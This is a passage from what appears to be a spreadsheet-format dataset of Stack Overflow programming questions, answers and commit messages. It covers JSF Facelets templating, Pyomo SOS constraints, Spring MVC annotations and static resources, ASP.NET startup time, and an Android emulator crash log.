    xmlns:ui="http://xmlns.jcp.org/jsf/facelets"&gt;
    &lt;h:head&gt;
        &lt;title&gt;Include demo&lt;/title&gt;
    &lt;/h:head&gt;
    &lt;h:body&gt;
        &lt;h1&gt;Master page&lt;/h1&gt;
        &lt;p&gt;Master page blah blah lorem ipsum&lt;/p&gt;
        &lt;ui:include src="/WEB-INF/include.xhtml" /&gt;
    &lt;/h:body&gt;
&lt;/html&gt;
The include page /WEB-INF/include.xhtml (yes, this is the file in its entirety, any tags outside &lt;ui:composition&gt; are unnecessary as they are ignored by Facelets anyway):
&lt;ui:composition 
    xmlns="http://www.w3.org/1999/xhtml"
    xmlns:f="http://xmlns.jcp.org/jsf/core"
    xmlns:h="http://xmlns.jcp.org/jsf/html"
    xmlns:ui="http://xmlns.jcp.org/jsf/facelets"&gt;
    &lt;h2&gt;Include page&lt;/h2&gt;
    &lt;p&gt;Include page blah blah lorem ipsum&lt;/p&gt;
&lt;/ui:composition&gt;
This needs to be opened by /page.xhtml. Do note that you don't need to repeat &lt;html&gt;, &lt;h:head&gt; and &lt;h:body&gt; inside the include file as that would otherwise result in invalid HTML.
You can use a dynamic EL expression in &lt;ui:include src&gt;. See also https://stackoverflow.com/questions/7108668/how-to-ajax-refresh-dynamic-include-content-by-navigation-menu-jsf-spa.
&lt;ui:define&gt;/&lt;ui:insert&gt;
A more advanced way of including is templating. This includes basically the other way round. The master template page should use &lt;ui:insert&gt; to declare places to insert defined template content. The template client page which is using the master template page should use &lt;ui:define&gt; to define the template content which is to be inserted.
Master template page /WEB-INF/template.xhtml (as a design hint: the header, menu and footer can in turn even be &lt;ui:include&gt; files):
&lt;!DOCTYPE html&gt;
&lt;html lang="en"
    xmlns="http://www.w3.org/1999/xhtml"
    xmlns:f="http://xmlns.jcp.org/jsf/core"
    xmlns:h="http://xmlns.jcp.org/jsf/html"
    xmlns:ui="http://xmlns.jcp.org/jsf/facelets"&gt;
    &lt;h:head&gt;
        &lt;title&gt;&lt;ui:insert name="title"&gt;Default title&lt;/ui:insert&gt;&lt;/title&gt;
    &lt;/h:head&gt;
    &lt;h:body&gt;
        &lt;div id="header"&gt;Header&lt;/div&gt;
        &lt;div id="menu"&gt;Menu&lt;/div&gt;
        &lt;div id="content"&gt;&lt;ui:insert name="content"&gt;Default content&lt;/ui:insert&gt;&lt;/div&gt;
        &lt;div id="footer"&gt;Footer&lt;/div&gt;
    &lt;/h:body&gt;
&lt;/html&gt;
Template client page /page.xhtml (note the template attribute; also here, this is the file in its entirety):
&lt;ui:composition template="/WEB-INF/template.xhtml"
    xmlns="http://www.w3.org/1999/xhtml"
    xmlns:f="http://xmlns.jcp.org/jsf/core"
    xmlns:h="http://xmlns.jcp.org/jsf/html"
    xmlns:ui="http://xmlns.jcp.org/jsf/facelets"&gt;
    &lt;ui:define name="title"&gt;
        New page title here
    &lt;/ui:define&gt;
    &lt;ui:define name="content"&gt;
        &lt;h1&gt;New content here&lt;/h1&gt;
        &lt;p&gt;Blah blah&lt;/p&gt;
    &lt;/ui:define&gt;
&lt;/ui:composition&gt;
This needs to be opened by /page.xhtml. If there is no &lt;ui:define&gt;, then the default content inside &lt;ui:insert&gt; will be displayed instead, if any.
&lt;ui:param&gt;
You can pass parameters to &lt;ui:include&gt; or &lt;ui:composition template&gt; by &lt;ui:param&gt;.
&lt;ui:include ...&gt;
    &lt;ui:param name="foo" value="#{bean.foo}" /&gt;
&lt;/ui:include&gt;
&lt;ui:composition template="..."&gt;
    &lt;ui:param name="foo" value="#{bean.foo}" /&gt;
    ...
&lt;/ui:composition &gt;
Inside the include/template file, it'll be available as #{foo}. In case you need to pass "many" parameters to &lt;ui:include&gt;, then you'd better consider registering the include file as a tagfile, so that you can ultimately use it like so &lt;my:tagname foo="#{bean.foo}"&gt;. See also https://stackoverflow.com/questions/6822000
You can even pass whole beans, methods and parameters via &lt;ui:param&gt;. See also https://stackoverflow.com/questions/8004233/jsf-2-how-to-pass-an-action-including-an-argument-to-be-invoked-to-a-facelets-s
Design hints
The files which aren't supposed to be publicly accessible by just entering/guessing its URL, need to be placed in /WEB-INF folder, like as the include file and the template file in above example. See also https://stackoverflow.com/questions/9031811
There doesn't need to be any markup (HTML code) outside &lt;ui:composition&gt; and &lt;ui:define&gt;. You can put any, but they will be ignored by Facelets. Putting markup in there is only useful for web designers. See also https://stackoverflow.com/questions/10504190
The HTML5 doctype is the recommended doctype these days, "in spite of" that it's a XHTML file. You should see XHTML as a language which allows you to produce HTML output using a XML based tool. See also https://stackoverflow.com/questions/2935759/is-it-possible-to-use-jsffacelets-with-html-4-5 and https://stackoverflow.com/questions/19189372/javaserver-faces-2-2-and-html5-support-why-is-xhtml-still-being-used.
CSS/JS/image files can be included as dynamically relocatable/localized/versioned resources. See also https://stackoverflow.com/questions/8367421/how-to-reference-css-js-image-resource-in-facelets-template
You can put Facelets files in a reusable JAR file. See also https://stackoverflow.com/questions/8320486.
For real world examples of advanced Facelets templating, check the src/main/webapp folder of Java EE Kickoff App source code and OmniFaces showcase site source code.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm solving a problem with pyomo where I have a variable with multiple indexes. One of them is T(the kind of technology selected). I want to make a SOS1 constraint so for each pair of product and location only one technology is selected. Q is the variable that represents how much is produced in L of P with tech T.&lt;/p&gt;
&lt;p&gt;Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model.P = pyo.Set()
model.L = pyo.Set()
model.T = pyo.Set()
model.Q = pyo.Var(model.P, model.L, model.T)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know how to do this with binary variables. But Im trying to use sos constraint and also as I understand the sos constraint approach should be faster.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C478</t>
  </si>
  <si>
    <t>Packages and MVC renaming
https://stackoverflow.com/questions/15922991/is-spring-annotation-controller-same-as-service</t>
  </si>
  <si>
    <t>No, they are pretty different from each other.
Both are different specializations of
@Component
annotation (in practice, they're two different implementations of the same interface) so both can be discovered by the classpath scanning (if you declare it in your XML configuration)
@Service
annotation is used in your service layer and annotates classes that perform service tasks, often you don't use it but in many case you use this annotation to represent a best practice. For example, you could directly call a DAO class to persist an object to your database but this is horrible. It is pretty good to call a service class that calls a DAO. This is a good thing to perform the separation of concerns pattern.
@Controller
annotation is an annotation used in Spring MVC framework (the component of Spring Framework used to implement Web Application). The @Controller annotation indicates that a particular class serves the role of a controller. The @Controller annotation acts as a stereotype for the annotated class, indicating its role. The dispatcher scans such annotated classes for mapped methods and detects @RequestMapping annotations.
So looking at the Spring MVC architecture you have a DispatcherServlet class (that you declare in your XML configuration) that represent a front controller that dispatch all the HTTP Request towards the appropriate controller classes (annotated by @Controller). This class perform the business logic (and can call the services) by its method. These classes (or its methods) are typically annotated also with
@RequestMapping
annotation that specify what HTTP Request is handled by the controller and by its method.
For example:
@Controller
@RequestMapping("/appointments")
public class AppointmentsController {
    private final AppointmentBook appointmentBook;
    @Autowired
    public AppointmentsController(AppointmentBook appointmentBook) {
        this.appointmentBook = appointmentBook;
    }
    @RequestMapping(method = RequestMethod.GET)
    public Map&lt;String, Appointment&gt; get() {
        return appointmentBook.getAppointmentsForToday();
    }
This class is a controller.
This class handles all the HTTP Request toward "/appointments" "folder" and in particular the get method is the method called to handle all the GET HTTP Request toward the folder "/appointments".
I hope that now it is more clear for you.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a large (100s of assemblies) asp.net application and during development it can take a couple of minutes for the first page to load after a recompile. 
I am told that much of the delay comes from JITing the assemblies and that this delay is proportional to the number (but not the size) of assemblies. I have not yet measured this. 
We are working on architectural changes to improve the situation (combine assemblies, decouple applications) but I was wondering if there are any quick hit fixes that I can get by, for example, changing IIS settings in development or combining DLLs post-build.
We are using .net 3.5.
Any suggestions for me?
</t>
  </si>
  <si>
    <t>C479</t>
  </si>
  <si>
    <t>enable CORS globally in the MVC Java config, issue #6
refer:
1. https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-cors-global-java
2. https://stackoverflow.com/a/33852040</t>
  </si>
  <si>
    <t>Not to raise the dead after more than a year, but all the previous answers miss some crucial points:
@EnableWebMvc
on your class will disable
org.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration
. That's fine if you want complete control but otherwise, it's a problem.
There's no need to write any code to add another location for static resources in addition to what is already provided. Looking at
org.springframework.boot.autoconfigure.web.ResourceProperties
from v1.3.0.RELEASE, I see a field
staticLocations
that can be configured in the
application.properties
. Here's a snippet from the source:
/**
 * Locations of static resources. Defaults to classpath:[/META-INF/resources/,
 * /resources/, /static/, /public/] plus context:/ (the root of the servlet context).
 */
private String[] staticLocations = RESOURCE_LOCATIONS;
As mentioned before, the request URL will be resolved
relative
to these locations. Thus
src/main/resources/static/index.html
will be served when the request URL is
/index.html
. The class that is responsible for resolving the path, as of Spring 4.1, is
org.springframework.web.servlet.resource.PathResourceResolver
.
Suffix pattern matching is enabled by default which means for a request URL
/index.html
, Spring is going to look for handlers corresponding to
/index.html
. This is an issue if the intention is to serve static content. To disable that, extend
WebMvcConfigurerAdapter
(but don't use
@EnableWebMvc
) and override
configurePathMatch
as shown below:
@Override
public void configurePathMatch(PathMatchConfigurer configurer) {
    super.configurePathMatch(configurer);
    configurer.setUseSuffixPatternMatch(false);
}
IMHO, the only way to have fewer bugs in your code is not to write code whenever possible. Use what is already provided, even if that takes some research, the return is worth it.
Edit July 2021:
WebMvcConfigurerAdapter
has been deprecated since Spring 5. Implement
WebMvcConfigurer
and annotate with
@Configuration
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to run Android Emulator, but it keeps crashing with a message that says &lt;code&gt;&amp;quot;The emulator process for AVD &amp;lt;EMULATOR_NAME&amp;gt; has terminated&amp;quot;&lt;/code&gt; when I try to start any device I create.&lt;/p&gt;
&lt;p&gt;Suggestions I've followed so far:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Updating my GPU's drivers&lt;/li&gt;
&lt;li&gt;Creating a device with 8GB RAM&lt;/li&gt;
&lt;li&gt;Cold booting&lt;/li&gt;
&lt;li&gt;Disabling Hyper-V Services&lt;/li&gt;
&lt;li&gt;Creating devices using older APIs&lt;/li&gt;
&lt;li&gt;Setting graphics to 'Hardware' when configuring the device&lt;/li&gt;
&lt;li&gt;Checking for C++ redistributable pending updates&lt;/li&gt;
&lt;li&gt;Always launching Android Studio with admin rights&lt;/li&gt;
&lt;li&gt;Uninstalling/reinstalling the emulator&lt;/li&gt;
&lt;li&gt;Uninstalling/reinstalling Android Studio Ladybug 2024.2.2&lt;/li&gt;
&lt;li&gt;Installing Android Studio Koala 2024.1.1&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Other than the errors in the title (&amp;quot;WHPX: Failed to setup partition&amp;quot; and &amp;quot;WHPX: Invalid argument&amp;quot;), the log file also mentions that &lt;code&gt;quickbootChoice.ini&lt;/code&gt; couldn't be processed for reading and I noticed that, for some reason, it's never created when I add a device.&lt;/p&gt;
&lt;p&gt;I'll leave my specs below, but the compatibility check does pass, so I'm assuming that's not the issue:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WINDOWS 11 Pro&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CPU: i5-12400&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;GPU: NVIDIA GeForce GTX 1650&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RAM: 16GB&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/fzwtUnZ6.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;
&lt;a href="https://i.sstatic.net/f5yPRRm6.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2025-02-18 20:32:38,559 [ 185814]   INFO - Emulator: Pixel 6 Pro API 35 - C:\Users\arian\AppData\Local\Android\Sdk\emulator\emulator.exe -netdelay none -netspeed full -avd Pixel_6_Pro_API_35
2025-02-18 20:32:38,606 [ 185861]   INFO - Emulator: Pixel 6 Pro API 35 - Android emulator version 35.3.11.0 (build_id 12836668) (CL:N/A)
2025-02-18 20:32:38,606 [ 185861]   INFO - Emulator: Pixel 6 Pro API 35 - Graphics backend: gfxstream
2025-02-18 20:32:38,606 [ 185861]   INFO - Emulator: Pixel 6 Pro API 35 - Found systemPath C:\Users\arian\AppData\Local\Android\Sdk\system-images\android-35\google_apis\x86_64\
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - I0218 20:32:39.197957   10980 opengles.cpp:285] android_startOpenglesRenderer: gpu info
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - I0218 20:32:39.197975   10980 opengles.cpp:286] GPU #1
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - Make: 10de
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - Model: NVIDIA GeForce GTX 1650
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - Device ID: 1f0a
2025-02-18 20:32:39,187 [ 186442]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Increasing RAM size to 3072MB
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - IPv4 server found: 192.168.0.1
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: e0d1:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: e0d1:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: e0d1:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: d8d7:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: d8d7:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: d8d7:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: f0dd:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: f0dd:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: f0dd:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: c0ee:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,313 [ 186568]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: c0ee:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Ignore IPv6 address: c0ee:59f4:6b01:0:e0d1:59f4:6b01:0
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Checking system compatibility:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -   Checking: hasSufficientDiskSpace
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -      Ok: Disk space requirements to run avd: `Pixel_6_Pro_API_35` are met.
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -   Checking: hasSufficientHwGpu
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -      Ok: Hardware GPU requirements to run avd: `Pixel_6_Pro_API_35` are passed.
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -   Checking: hasSufficientSystem
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 -      Ok: System requirements to run avd: `Pixel_6_Pro_API_35` are met.
2025-02-18 20:32:39,314 [ 186569]   WARN - Emulator: Pixel 6 Pro API 35 - Failed to process .ini file C:\Users\arian\.android\Pixel_6_Pro_API_35.avd\quickbootChoice.ini for reading.
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Critical:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Warning:
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - Storing crashdata in: C:\Users\arian\AppData\Local\Temp\\AndroidEmulator\emu-crash-35.3.11.db, detection is enabled for process: 7592
2025-02-18 20:32:39,314 [ 186569]   INFO - Emulator: Pixel 6 Pro API 35 - library_mode host gpu mode host
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - emuglConfig_get_vulkan_hardware_gpu: Using gpu 'NVIDIA GeForce GTX 1650' for vulkan support (1.4.303, 4149MB)
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - GPU device local memory = 4149MB
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - Initializing hardware OpenGLES emulation support
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - HealthMonitor disabled.
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [vulkan-1.dll]
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [vulkan-1.dll]: not found in map, open for the first time
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [vulkan-1.dll] (win32): call LoadLibraryA
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open succeeded for [vulkan-1.dll]. File name: [C:\Windows\SYSTEM32\vulkan-1.dll]
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - Added library: vulkan-1.dll
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - Selecting Vulkan device: NVIDIA GeForce GTX 1650, Version: 1.4.303
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - Supports id properties, got a vulkan device UUID
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [opengl32.dll]: not found in map, open for the first time
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [opengl32.dll] (win32): call LoadLibraryA
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open succeeded for [opengl32.dll]. File name: [C:\Windows\SYSTEM32\opengl32.DLL]
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [libshadertranslator.dll]: not found in map, open for the first time
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,315 [ 186570]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open for [libshadertranslator.dll] (win32): call LoadLibraryA
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - SharedLibrary::open succeeded for [libshadertranslator.dll]. File name: [C:\Users\arian\AppData\Local\Android\Sdk\emulator\lib64\libshadertranslator.dll]
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - 
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - Initializing VkEmulation features:
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     glInteropSupported: true
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     useDeferredCommands: true
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     createResourceWithRequirements: true
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     useVulkanComposition: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     useVulkanNativeSwapchain: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     enable guestRenderDoc: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     ASTC LDR emulation mode: 2
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     enable ETC2 emulation: true
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     enable Ycbcr emulation: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     guestVulkanOnly: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 -     useDedicatedAllocations: false
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - Graphics Adapter Vendor Google (NVIDIA Corporation)
2025-02-18 20:32:39,316 [ 186571]   INFO - Emulator: Pixel 6 Pro API 35 - Graphics Adapter Android Emulator OpenGL ES Translator (NVIDIA GeFo
2025-02-18 20:32:39,399 [ 186654]   INFO - Emulator: Pixel 6 Pro API 35 - C:\Users\arian\AppData\Local\Android\Sdk\emulator\qemu\windows-x86_64\qemu-system-x86_64.exe: WHPX: Failed to setup partition, hr=c0350005
2025-02-18 20:32:39,400 [ 186655]   INFO - Emulator: Pixel 6 Pro API 35 - C:\Users\arian\AppData\Local\Android\Sdk\emulator\qemu\windows-x86_64\qemu-system-x86_64.exe: failed to initialize WHPX: Invalid argument
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - netsimd I 02-18 23:32:39.411 daemon\src\rust_main.rs:98 - netsim artifacts path: &amp;quot;C:\\Users\\arian\\AppData\\Local\\Temp\\netsimd&amp;quot;
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - netsimd I 02-18 23:32:39.411 daemon\src\rust_main.rs:101 - NetsimdArgs {
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - fd_startup_str: None,
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - no_cli_ui: true,
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - no_web_ui: true,
2025-02-18 20:32:39,410 [ 186665]   INFO - Emulator: Pixel 6 Pro API 35 - pcap: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - disable_address_reuse: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - hci_port: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - connector_instance: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - instance: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - logtostderr: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - dev: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - rust_grpc: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - rust_hostapd: true,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - rust_slirp: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - forward_host_mdns: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - vsock: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - config: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - host_dns: Some(
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - &amp;quot;192.168.0.1,2804:14d:1:0:181:213:132:9,2804:14d:1:0:181:213:132:8&amp;quot;,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - ),
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - http_proxy: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - wifi_tap: None,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - test_beacons: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - no_test_beacons: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - no_shutdown: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - verbose: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - version: false,
2025-02-18 20:32:39,411 [ 186666]   INFO - Emulator: Pixel 6 Pro API 35 - }
2025-02-18 20:32:39,425 [ 186680]   WARN - #com.android.ddmlib - * daemon not running; starting now at tcp:5037
2025-02-18 20:32:39,447 [ 186702]   WARN - #com.android.ddmlib - * daemon started successfully
2025-02-18 20:32:39,453 [ 186708]   INFO - #com.android.ddmlib - Connected to adb for device monitoring
2025-02-18 20:32:39,661 [ 186916]   INFO - #com.android.tools.idea.adb.AdbService - Successfully connected to adb
2025-02-18 20:32:39,672 [ 186927]   INFO - #com.android.adblib.impl.services.TrackDevicesService - &amp;quot;host:track-devices-proto-binary&amp;quot; - opening connection to ADB server, timeout: 4,999.0 msec remaining, 0.0 msec elapsed
2025-02-18 20:32:41,705 [ 188960]   INFO - #c.i.w.i.i.j.s.JpsGlobalModelSynchronizerImpl - Saving global entities com.intellij.platform.workspace.jps.entities.SdkEntity to files
2025-02-18 20:32:41,706 [ 188961]   INFO - #c.i.w.i.i.j.s.JpsGlobalModelSynchronizerImpl - Saving global entities com.intellij.platform.workspace.jps.entities.LibraryEntity to files
2025-02-18 20:32:49,615 [ 196870]   INFO - Emulator: Pixel 6 Pro API 35 - Process finished with exit code 1
2025-02-18 20:32:49,631 [ 196886]   WARN - Emulator: Pixel 6 Pro API 35 - Emulator terminated with exit code 1
2025-02-18 20:32:49,771 [ 197026]   WARN - #com.android.sdklib.deviceprovisioner.DeviceAction - The emulator process for AVD Pixel_6_Pro_API_35 has terminated.
com.android.tools.idea.avdmanager.EmulatorConnectionListener$EmulatorTerminatedException: The emulator process for AVD Pixel_6_Pro_API_35 has terminated.
    at com.android.tools.idea.avdmanager.EmulatorConnectionListener$WaitForEmulatorTask.run(EmulatorConnectionListener.java:93)
    at com.intellij.openapi.application.impl.RwLockHolder$executeOnPooledThread$1.run(RwLockHolder.kt:154)
    at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
    at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
    at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
    at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
    at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1$1.run(Executors.java:702)
    at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1$1.run(Executors.java:699)
    at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
    at java.base/java.util.concurrent.Executors$PrivilegedThreadFactory$1.run(Executors.java:699)
